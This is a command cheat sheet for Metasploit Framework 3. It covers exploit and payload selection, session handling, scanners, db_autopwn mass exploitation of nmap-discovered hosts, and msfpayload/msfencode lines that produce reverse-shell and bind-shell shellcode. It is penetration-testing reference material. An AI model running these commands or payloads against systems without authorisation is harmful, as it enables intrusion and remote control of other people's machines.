-
Metasploit Framework 3
svn update
Web Interface:
./msfweb
Console:
./msfconsole
help
show exploits
search <name>
use <exploit name>
show options
set <OPTION NAME> <option>
show payloads
set PAYLOAD <payload name>
show options
set <OPTION NAME> <option>
show targets
set TARGET <target number>
exploit
sessions -l
sessions -i <id>
<ctrl> z
<ctrl> c
jobs
jobs -K
Auxiliary scanners:
show auxiliary
use <auxiliary name>
set <OPTION NAME> <option>
run
scanner/discovery/sweep_udp
scanner/smb/version
scanner/mssql/mssql_ping
scanner/mssql/mssql_login
Payloads:
Attacker behind firewall: bind shell
Target behind firewall: reverse shell
-
Meterpreter
Automated:
db_import_nessus_nbe
db_import_nmap_xml
./start-db-autopwn
su - postgres
cd /pentest/exploit/framework3
./msfconsole
load db_postgres
db_create
db_nmap targetIP
db_hosts
db_services
db_autopwn
db_autopwn -t -p -e
Command Line Interface:
./msfcli | grep -i <name>
./msfcli <exploit or auxiliary> S
./msfcli <exploit name> <OPTION NAME>=<option> PAYLOAD=<payload name> E
Payload generator:
./msfpayload <payload> <variable=value> <output type>
S summary and options of payload
C C language
P Perl
y Ruby
R Raw, allows payload to be piped into msfencode and other tools
J JavaScript
X executable (Windows only)
./msfpayload windows/shell/reverse_tcp LHOST=10.1.1.1 C
Encode shellcode:
./msfencode <options> <variable=value>
Pipe the output of msfpayload into msfencode, show bad characters and list available encoders.
./msfpayload linux_ia32_bind LPORT=4444 R | ./msfencode -b '\x00' -l
Choose the PexFnstenvMor encoder and format the output to C.
./msfpayload linux_ia32_bind LPORT=4444 R | ./msfencode -b '\x00' -e PexFnstenvMor -t c